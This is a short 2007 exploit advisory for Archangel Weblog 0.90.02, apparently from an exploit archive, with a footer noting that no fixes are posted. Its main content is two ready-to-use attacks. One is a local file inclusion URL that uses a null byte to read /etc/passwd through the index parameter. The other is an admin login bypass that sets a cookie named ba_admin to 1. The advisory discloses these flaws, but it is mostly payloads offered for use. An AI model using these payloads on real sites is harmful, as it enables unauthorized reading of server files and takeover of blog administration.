Archangel Weblog 0.90.02 Local File Inclusion - Admin Bypass Vulns

2007-05-05 00:00:00

\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Archangel Weblog version 0.90.02
Home : http://www.archangelmgt.com/weblog.shtml
Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
Author : Dj7xpl / [email protected]
HomePage : http://Dj7xpl.2600.ir
Type : Local File Inclusion & Login Page Bypass By Cookie
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host : Target
Name : ba_admin
Value : 1 <------ (Admin User Id)

And Go To Admin Panel :

http://[Target]/[Path]/Admin/

+---------------------------------------------------------------------------------------------+

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.